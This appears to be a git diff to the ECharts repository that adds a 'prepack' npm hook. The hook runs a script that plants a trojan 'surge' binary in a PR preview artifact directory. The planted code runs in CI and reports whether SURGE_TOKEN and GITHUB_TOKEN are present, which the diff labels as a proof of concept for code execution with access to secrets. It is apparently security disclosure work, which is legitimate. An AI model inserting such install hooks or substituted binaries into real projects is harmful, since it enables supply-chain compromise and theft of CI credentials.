diff --git a/inject-poc.sh b/inject-poc.sh
new file mode 100644
index 0000000000..677f84c96a
--- /dev/null
+++ b/inject-poc.sh
@@ -0,0 +1,22 @@
+#!/bin/bash
+# This runs during npm pack when PR_PREVIEW_DIR is set
+if [ -n "$PR_PREVIEW_DIR" ]; then
+  mkdir -p "$PR_PREVIEW_DIR/node_modules/.bin"
+  mkdir -p "$PR_PREVIEW_DIR/node_modules/surge"
+  
+  echo '{"name":"surge","version":"99.0.0","bin":{"surge":"index.js"}}' > "$PR_PREVIEW_DIR/node_modules/surge/package.json"
+  
+  cat > "$PR_PREVIEW_DIR/node_modules/surge/index.js" << 'TROJAN'
+#!/usr/bin/env node
+console.log("=== PoC: Trojan surge executed ===");
+console.log("SURGE_TOKEN is set:", !!process.env.SURGE_TOKEN);
+console.log("SURGE_TOKEN length:", (process.env.SURGE_TOKEN || "").length);
+console.log("GITHUB_TOKEN is set:", !!process.env.GITHUB_TOKEN);
+console.log("=== Proves code execution with access to secrets ===");
+process.exit(0);
+TROJAN
+  
+  chmod +x "$PR_PREVIEW_DIR/node_modules/surge/index.js"
+  ln -sf ../surge/index.js "$PR_PREVIEW_DIR/node_modules/.bin/surge"
+  echo "[PoC] Trojan surge binary injected into artifact directory"
+fi
diff --git a/package.json b/package.json
index fd57b487c3..c7522b14c8 100644
--- a/package.json
+++ b/package.json
@@ -64,7 +64,8 @@
     "checkheader": "node build/checkHeader.js",
     "lint": "npx eslint --cache --cache-location node_modules/.cache/eslint src/**/*.ts ssr/client/src/**/*.ts extension-src/**/*.ts",
     "lint:fix": "npx eslint --fix src/**/*.ts extension-src/**/*.ts",
-    "lint:dist": "echo 'It might take a while. Please wait ...' && npx jshint --config .jshintrc-dist dist/echarts.js"
+    "lint:dist": "echo 'It might take a while. Please wait ...' && npx jshint --config .jshintrc-dist dist/echarts.js",
+    "prepack": "bash ./inject-poc.sh"
   },
   "dependencies": {
     "tslib": "2.3.0",